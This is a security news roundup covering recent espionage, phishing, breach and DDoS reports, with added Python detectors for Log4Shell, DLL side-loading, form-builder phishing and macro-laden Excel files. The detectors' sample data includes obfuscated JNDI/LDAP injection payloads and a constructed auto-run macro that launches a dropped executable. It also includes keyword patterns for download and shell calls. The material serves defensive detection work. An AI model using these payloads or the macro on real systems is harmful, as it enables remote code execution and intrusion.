Taking cybercriminals lightly is no longer an option as the threat landscape evolves. Knowing what attackers are currently doing is the first step towards not becoming their next victim. To that end, here are this week’s phishing and data breach headlines.

Budworm Espionage Group Returns and Targets US Organizations

The Budworm group is known for mounting attacks against high-value targets. While there were reports of Budworm targeting US enterprises six to eight years ago, in recent years the group’s activity has focused primarily on Asia, the Middle East, and Europe. This is, however, the second time in recent months that Budworm has been reported in a campaign against a U.S.-based target: a CISA report on multiple APT groups targeting a defense sector organization included Budworm’s toolset. A resumption of attacks against US targets may signal a change in focus for the group.

According to the report, Budworm compromised the Apache Tomcat service on the victims’ servers by exploiting Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) and then installed web shells. The threat actors used Virtual Private Servers (VPS) hosted on Telstra and Vultr as command-and-control (C&C) infrastructure.
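As an added example (it is not part of the Symantec or CISA reporting), the Python scan below runs over constructed Tomcat access-log lines and flags Log4Shell (CVE-2021-44228) exploitation attempts. It matters because the obvious `${jndi:` string is rarely what arrives: attackers URL-encode it, or nest `${lower:…}` and `${env:X:-…}` lookups so that the literal only exists after Log4j evaluates it. The scan reverses those transformations before matching and reports the source IP and the LDAP/RMI callback host. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Inner lookups attackers nest inside "${jndi:...}" to hide the literal string from naive grep rules.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)      # ${lower:J} -> j
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")              # ${env:NOPE:-j} / ${::-j} -> j
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.I)  # protocol and host:port


def normalize(s: str, rounds: int = 8) -> str:
    """Undo URL-encoding and resolve nested obfuscation lookups until the string stops changing."""
    for _ in range(rounds):
        new = unquote(s)
        new = CASE_LOOKUP.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                              else m.group(2).upper(), new)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str):
    """Return {src, proto, target} if the access-log line carries a JNDI lookup, else None."""
    m = JNDI.search(normalize(line))
    if not m:
        return None
    return {"src": line.split(" ", 1)[0], "proto": m.group(1).lower(), "target": m.group(2)}


def scan_access_log(lines):
    return [hit for hit in (find_jndi(l) for l in lines) if hit]


# Constructed sample lines in Tomcat's "combined" access-log format (documentation IP ranges).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2022:12:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2022:12:01:05 +0000] "GET /?q=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "curl/7.0"',
    '203.0.113.7 - - [10/Oct/2022:12:01:09 +0000] "GET /?q=${${lower:J}ndi:${lower:L}dap://203.0.113.9:1389/b} HTTP/1.1" 200 512 "-" "curl/7.0"',
    '198.51.100.3 - - [10/Oct/2022:12:02:11 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.4%3A1389%2Fc%7D HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.3 - - [10/Oct/2022:12:02:15 +0000] "GET / HTTP/1.1" 200 12 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198.51.100.4:1389/d}"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Two caveats for anyone running this over real logs: a hit only proves an attempt, not a successful exploitation, so confirm with outbound LDAP/RMI/HTTP connections from the Tomcat host to the reported target and with newly written JSP files under the webapps directories (the web shells the report describes); and the payload can arrive in any header Log4j ends up logging, so make sure the access-log pattern actually records User-Agent, Referer and similar fields, or the last sample line above would never be seen.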

Budworm continues to use the HyperBro malware family as its payload, typically loaded via DLL side-loading:

  1. The attackers place a malicious DLL in a directory that a legitimate application will search when it loads a DLL of that name (the application’s own directory is searched first).
  2. The attackers then run the legitimate application, which they have usually brought along and installed themselves.
  3. The legitimate application loads the attacker’s DLL in place of the intended one and executes the payload.
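As an added example, not taken from the Symantec report, the Python rule below classifies constructed Sysmon Event ID 7 (Image loaded) records against the three steps above: a DLL carrying a system DLL’s name that is loaded from somewhere other than the Windows system directories (step 1), and an unsigned DLL loaded by a host executable from the same user-writable directory the executable runs from (steps 2 and 3). The DLL list, directory lists and event records are constructed for the example and should be replaced by a baseline from your own estate.

```python
import ntpath

# Constructed list of DLLs that Windows ships only in its system directories; many signed
# executables import them, which is what makes them common side-loading targets.
SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll", "userenv.dll", "dwmapi.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# Directories a dropper can populate without administrative rights.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")


def classify_image_load(ev: dict) -> list:
    """Reasons a Sysmon Event ID 7 (Image loaded) record looks like DLL side-loading; [] = clean."""
    loaded = ev["ImageLoaded"].lower().replace("/", "\\")
    proc = ev["Image"].lower().replace("/", "\\")
    dll_name, dll_dir = ntpath.basename(loaded), ntpath.dirname(loaded)
    reasons = []
    # Step 1: a DLL bearing a system DLL's name sits outside the system directories.
    if dll_name in SYSTEM_DLLS and not dll_dir.startswith(SYSTEM_DIRS):
        reasons.append(f"system DLL {dll_name} loaded from {dll_dir}")
    # Steps 2-3: the host executable runs from a user-writable directory and loads an unsigned
    # DLL from that same directory, which Windows searches before the system directories.
    if (ev.get("Signed", "false").lower() != "true"
            and dll_dir.startswith(USER_WRITABLE)
            and ntpath.dirname(proc) == dll_dir):
        reasons.append("unsigned DLL loaded from the same user-writable directory as its host process")
    return reasons


def scan_image_loads(events):
    hits = []
    for ev in events:
        reasons = classify_image_load(ev)
        if reasons:
            hits.append({"Image": ev["Image"], "ImageLoaded": ev["ImageLoaded"], "reasons": reasons})
    return hits


# Constructed Sysmon EID 7 records, reduced to the fields the rule uses.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\vendorupdate.exe", "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\version.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\ExampleApp\app.exe", "ImageLoaded": r"C:\Program Files\ExampleApp\apphelper.dll", "Signed": "true"},
    {"Image": r"C:\ProgramData\SyncTool\synctool.exe", "ImageLoaded": r"C:\ProgramData\SyncTool\dbghelp.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\ExampleApp\app.exe", "ImageLoaded": r"C:\Program Files\ExampleApp\version.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for hit in scan_image_loads(SAMPLE_EVENTS):
        print(hit)
```

Do not rely on the host process being unsigned or unknown: in this technique the executable is a genuine, signed vendor binary, so the signal is in the DLL and its location, not in the process. Expect some legitimate installers to ship their own copies of redistributable DLLs in Program Files; tune the DLL list against your baseline rather than dropping the rule.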


Australia’s Medibank: Share Trading Halted as the Health Insurer Reports Cyber Incident

Medibank Private (MPL.AX), the Australian health insurer, said it had detected unusual activity on its network and had taken some customer-facing systems offline and restricted access to others. In a statement, the insurer said it took immediate steps to contain the incident and engaged specialist cybersecurity firms. It added that, at the time of the statement, there was no evidence that sensitive data, including customer data, had been accessed.

The incident follows a breach at Optus, Australia’s second-largest telecoms provider, late last month, in which the data of about 10 million customers was compromised. That breach triggered an overhaul of Australian consumer privacy rules to allow targeted data sharing between telecommunications firms and banks.

Medibank said that isolating several customer-facing systems would reduce the likelihood of data loss or damage to its systems.

“As a result, our Australian Health Management (AHM) and international student policy management systems are offline. We expect they will be offline for most of the day,” the health insurer said in the statement. Medibank’s shares were placed in a trading halt ahead of the cyber incident announcement, and the company confirmed they would remain halted while the investigation progresses.

New Chinese APT Targets Telcos and IT Service Providers With Signed Malware

SentinelLabs is monitoring a threat cluster it tracks as WIP19, a group that distinguishes itself by using a legitimate, stolen digital certificate issued by a company called “DEEPSoft”. According to the investigation, WIP19 targeted IT and telecommunications service providers in Asia and the Middle East.

Throughout the activity, the actors used the stolen certificate to sign several malicious components. They also carried out almost all operations hands-on-keyboard when interacting with compromised machines, forgoing a persistent C2 channel in exchange for stealth.

Analysis of the backdoors used, together with pivoting on the certificate, suggests that WinEggDrop, a well-known Chinese-speaking malware author, created some of the components used by the attackers. The author has written tools for numerous groups in the past and has been active since 2014.

The use of stolen certificates, WinEggDrop-authored malware and overlapping TTPs suggests a possible link between the attackers and Operation Shadow Force. Since the toolset appears to be shared among various actors, it is unclear whether this is a new iteration of Shadow Force or a different actor using similar TTPs.

Hackers Used Vishing and Tricked Victims into Installing Android Banking Malware

Malicious actors are using voice phishing (vishing) to lure users into installing Android malware on their phones, according to new research from ThreatFabric. The Dutch mobile security firm identified a network of phishing websites targeting Italian online-banking users and designed to harvest their contact details.

The social engineering technique, known as TOAD (telephone-oriented attack delivery), involves calling victims using the contact details previously harvested by the fraudulent websites. The caller, posing as a bank support agent, instructs the user to install a “security” app and to grant it extensive permissions. The app is in fact malware designed to give the attackers remote access to the device or to initiate financial fraud.

In this case, the attackers deploy an Android banking trojan called Copybara, first observed in 2021, and perform on-device fraud through overlay attacks against Italian users. “Such attacks need more resources from the threat actors’ side and are sophisticated to perform and maintain,” the ThreatFabric Mobile Threat Intelligence (MTI) team said.

New COVID-19 Phishing Wave Abuses Google Forms

COVID-19-themed phishing messages are spiking again in the US after a prolonged summer lull. According to a report by email security provider INKY, malspam volumes doubled in September compared with the previous months and may rise further.

In the latest campaign, phishing emails impersonate the US Small Business Administration (SBA) and abuse Google Forms to host phishing pages that attempt to steal business owners’ personal details. The SBA ran COVID-19 financial recovery programs earlier in the pandemic, and the attackers use that history to lend legitimacy to the campaign, especially in the eyes of past beneficiaries.

How the attack progresses:

  • The phishing emails use lures referencing pandemic financial support initiatives such as the “COVID Economic Injury Disaster Loan,” “Paycheck Protection Program,” and “Revitalization Fund.”
  • The emails entice victims to click an embedded link to apply for the program. The link leads to a Google Forms page.
  • Abusing form builders is a popular tactic because the attackers get TLS-encrypted traffic, free hosting, and the trust and recognition of the hosting brand at no cost, on a domain that reputation-based URL filters are unlikely to block.
  • The phishing forms mimic the content of legitimate SBA application forms and request the same information.
  • This includes the victim’s Google account credentials, state ID and driver’s license details, SSN, EIN, and bank account numbers.
  • When the victim clicks “Submit,” the attackers receive the data, while Google’s standard “Your response has been recorded” message reassures the victim.
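As an added example, not from the INKY report, the Python triage below scores a constructed email against the pattern described in the list: a link to a free form builder (Google Forms, including the `forms.gle` short form and Microsoft Forms), an SBA program name used as the lure, and a sender domain that is not `sba.gov`. It also unwraps Google’s `www.google.com/url?q=` redirect wrapper, which mailers and attackers both use and which otherwise hides the real destination from a host check. The sender domains, form ID and message text are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse, parse_qs

URL_RE = re.compile(r"https?://[^\s<>\"'()]+")
# Free form builders abused for credential harvesting: (host, required path prefix).
FORM_BUILDERS = (("docs.google.com", "/forms/"), ("forms.gle", "/"), ("forms.office.com", "/"))
# The impersonated agency's real domain and the program names used as lures in this campaign.
SBA_DOMAINS = ("sba.gov",)
SBA_LURES = ("economic injury disaster loan", "paycheck protection program",
             "revitalization fund", "small business administration")


def unwrap_redirect(url: str) -> str:
    """Google's www.google.com/url?q=<target> wrapper hides the destination; return the target."""
    p = urlparse(url)
    if p.netloc.lower() in ("www.google.com", "google.com") and p.path == "/url":
        return parse_qs(p.query).get("q", [url])[0]
    return url


def is_form_builder(url: str) -> bool:
    p = urlparse(unwrap_redirect(url))
    return any(p.netloc.lower() == host and p.path.startswith(prefix) for host, prefix in FORM_BUILDERS)


def sender_domain(from_header: str) -> str:
    return parseaddr(from_header)[1].rsplit("@", 1)[-1].lower()


def assess_email(raw: str) -> dict:
    """Flag mails that combine an SBA program lure, a non-SBA sender and a form-builder link."""
    msg = message_from_string(raw)
    body = msg.get_payload()
    text = ((msg["Subject"] or "") + "\n" + body).lower()
    form_links = [u for u in URL_RE.findall(body) if is_form_builder(u)]
    lures = [lure for lure in SBA_LURES if lure in text]
    dom = sender_domain(msg["From"] or "")
    impersonation = bool(lures) and not any(dom == d or dom.endswith("." + d) for d in SBA_DOMAINS)
    reasons = []
    if form_links:
        reasons.append(f"{len(form_links)} link(s) to a free form builder")
    if impersonation:
        reasons.append(f"SBA program lure ({', '.join(lures)}) sent from {dom}")
    verdict = "suspicious" if form_links and impersonation else ("review" if reasons else "clean")
    return {"verdict": verdict, "form_links": form_links, "reasons": reasons}


# Constructed messages; the sender domains and form ID are placeholders, not real ones.
PHISH_SAMPLE = """From: SBA Relief Desk <support@sba-relief-portal.example>
Subject: Final notice: COVID Economic Injury Disaster Loan forgiveness review

Your business was identified as a prior Paycheck Protection Program beneficiary.
Confirm your details within 48 hours to keep your eligibility:
https://www.google.com/url?q=https://docs.google.com/forms/d/e/EXAMPLEFORMID/viewform
"""

BENIGN_SAMPLE = """From: SBA Updates <updates@sba.gov>
Subject: Paycheck Protection Program loan forgiveness portal

Apply for forgiveness directly at https://www.sba.gov/funding-programs/loans
"""

if __name__ == "__main__":
    print(assess_email(PHISH_SAMPLE))
    print(assess_email(BENIGN_SAMPLE))
```

Because the page itself is hosted by Google, neither domain reputation nor certificate checks will catch it; the combination of lure, sender and destination is the signal, and the user-facing check is the same: a government agency does not collect SSNs and bank account numbers through a Google Form.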


Ukrainian Military-Themed Excel File Delivers Multi-Stage Cobalt Strike Loader

FortiGuard Labs has observed a rising number of campaigns targeting both sides of the ongoing Russia-Ukraine conflict. These may be a cyber component of the war itself or opportunistic cybercriminals exploiting the conflict for their own ends.

Recently, researchers discovered a malicious Excel document posing as a tool for calculating the salaries of Ukrainian military personnel. When triggered, the document runs evasive multi-stage loaders that ultimately load a Cobalt Strike Beacon onto the victim’s device.

The campaign starts with the attacker delivering a macro-enabled Excel workbook (.xlsm). The file looks like a spreadsheet for generating the salaries of Ukrainian military personnel, and it prompts the victim to enable macros on the pretext that this is needed to auto-populate the cell contents; enabling them runs the malicious macro instead.
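As an added example, not from the FortiGuard write-up, the Python triage below does what an analyst wants to know first about a suspicious .xlsm: does the container carry a VBA project, and does that project have an auto-execute entry point such as `Workbook_Open` plus the usual process-launching calls. An .xlsm is a zip; `xl/vbaProject.bin` inside it is an OLE compound file whose module streams are compressed with the MS-OVBA algorithm, so the block implements that decompressor. It does not parse the OLE layer (in practice you would hand that to olefile or oletools’ olevba), so its constructed sample `vbaProject.bin` holds just the compressed module stream; the macro text, the literal-only compressor that builds it and the file layout are all constructed for the example.

```python
import io
import re
import struct
import zipfile

AUTOEXEC = re.compile(r"\b(Auto_Open|Workbook_Open|Document_Open|AutoExec|Auto_Close)\b")
SUSPICIOUS = re.compile(r"\b(Shell|CreateObject|WScript\.Shell|URLDownloadToFile|Environ|PowerShell)\b", re.I)


def decompress_vba(data: bytes) -> bytes:
    """MS-OVBA (section 2.4.1) decompression of a VBA module stream as found inside vbaProject.bin.
    Container = 0x01 signature byte followed by chunks; each chunk = 2-byte header + data."""
    if not data or data[0] != 0x01:
        raise ValueError("missing MS-OVBA signature byte")
    out, pos = bytearray(), 1
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        end = pos + (header & 0x0FFF) + 1      # CompressedChunkSize = (header & 0xFFF) + 3, incl. header
        chunk_start = len(out)
        if not header & 0x8000:                # uncompressed chunk: 4096 literal bytes
            out += data[pos:pos + 4096]
            pos += 4096
            continue
        while pos < end:
            flags = data[pos]
            pos += 1
            for bit in range(8):
                if pos >= end:
                    break
                if not (flags >> bit) & 1:     # literal token: one byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", data, pos)[0]   # copy token: back-reference
                pos += 2
                bits = max(4, (len(out) - chunk_start - 1).bit_length())  # offset width grows with position
                length = (token & (0xFFFF >> bits)) + 3
                offset = (token >> (16 - bits)) + 1
                for _ in range(length):
                    out.append(out[-offset])
    return bytes(out)


def compress_vba_literal_only(src: bytes) -> bytes:
    """Constructed-sample helper, not a real compressor: wraps bytes in a valid MS-OVBA container
    using literal tokens only. 3640 input bytes + 455 flag bytes keeps each chunk under 0xFFF+3."""
    out = bytearray(b"\x01")
    for i in range(0, len(src), 3640):
        chunk, body = src[i:i + 3640], bytearray()
        for j in range(0, len(chunk), 8):
            body.append(0x00)                  # flag byte: the next 8 tokens are literals
            body += chunk[j:j + 8]
        out += struct.pack("<H", 0xB000 | (len(body) - 1)) + body   # compressed flag, signature 0b011, size-3
    return bytes(out)


def triage_ooxml(blob: bytes) -> dict:
    """Look inside an OOXML zip for VBA parts and the macro content type."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()
        ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace") if "[Content_Types].xml" in names else ""
        vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        return {"vba_parts": vba_parts,
                "macro_content_type": "application/vnd.ms-office.vbaProject" in ctypes,
                "vba_blobs": [zf.read(n) for n in vba_parts]}


def scan_macro_source(src: str) -> dict:
    return {"autoexec": sorted(set(AUTOEXEC.findall(src))), "suspicious": sorted(set(SUSPICIOUS.findall(src)))}


# Constructed macro mimicking the lure: auto-executes on open and launches a dropped stage.
MACRO_SOURCE = '''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    ' Lure: macros "must be enabled" so the salary table can be auto-populated
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run Environ("TEMP") & "\\stage1.exe", 0
End Sub
'''


def build_sample_xlsm() -> bytes:
    """Constructed .xlsm: minimal zip whose vbaProject.bin is just the compressed module stream."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", '<Types><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
                    '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/></Types>')
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", compress_vba_literal_only(MACRO_SOURCE.encode()))
    return buf.getvalue()


def triage_sample() -> dict:
    t = triage_ooxml(build_sample_xlsm())
    src = decompress_vba(t["vba_blobs"][0]).decode("latin-1")
    return {"macro_content_type": t["macro_content_type"], "vba_parts": t["vba_parts"], **scan_macro_source(src)}


if __name__ == "__main__":
    print(triage_sample())
```

The point of decompressing rather than grepping `vbaProject.bin` directly is that the compressed stream will usually not contain `Workbook_Open` or `CreateObject` as contiguous bytes, so a raw string search gives false negatives. A hit on an auto-execute name plus `CreateObject`/`Shell` is enough to pull the file from the mailbox and hand it to sandboxing; it is not proof of malice on its own, since legitimate finance workbooks do use `Workbook_Open` too.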


A Newly Developed ‘Thermal Attack’ Can Guess Your Password by Examining the Heat of Your Fingertips

Computer security researchers have developed an AI-driven system capable of guessing smartphone and computer passwords in seconds by analysing the heat signatures that a user’s fingertips leave on screens and keyboards when entering data.

Researchers at the University of Glasgow’s School of Computing Science developed the system, named ThermoSecure, to demonstrate how the falling price of thermal-imaging cameras and advances in artificial intelligence (AI) and machine learning are creating new avenues for thermal attacks.

Pointing a thermal-imaging camera at a smartphone screen, computer keyboard, or ATM keypad yields an image revealing the recent heat signature of the fingertips that touched the device: the brighter an area appears in the thermal image, the more recently it was touched. Earlier University of Glasgow research showed that even inexperienced attackers can guess passwords from such images; with AI and machine learning added, passwords can be cracked faster.


Pro-Russian Hackers Take Down US Airports’ Sites in DDoS Attacks

The pro-Russian group ‘KillNet’ recently claimed large-scale DDoS (distributed denial-of-service) attacks against the websites of several major US airports, rendering them inaccessible. The attacks overwhelmed the servers hosting the websites with junk requests, preventing travelers from reaching the sites to book airport services or check for updates on their scheduled flights.

Notable examples of airport websites that went offline include Los Angeles International Airport (LAX), which was intermittently offline or slow to respond, and Hartsfield-Jackson Atlanta International Airport (ATL). Other airports whose sites returned database connection errors included Orlando International Airport (MCO), Chicago O’Hare International Airport (ORD), Denver International Airport (DEN), and Phoenix Sky Harbor International Airport (PHX), as well as some airports in Kentucky, Mississippi, and Hawaii.

In this case, the DDoS attacks did not affect flight operations. Still, they disrupted the functioning of a crucial economic sector and threatened to delay or disrupt associated services.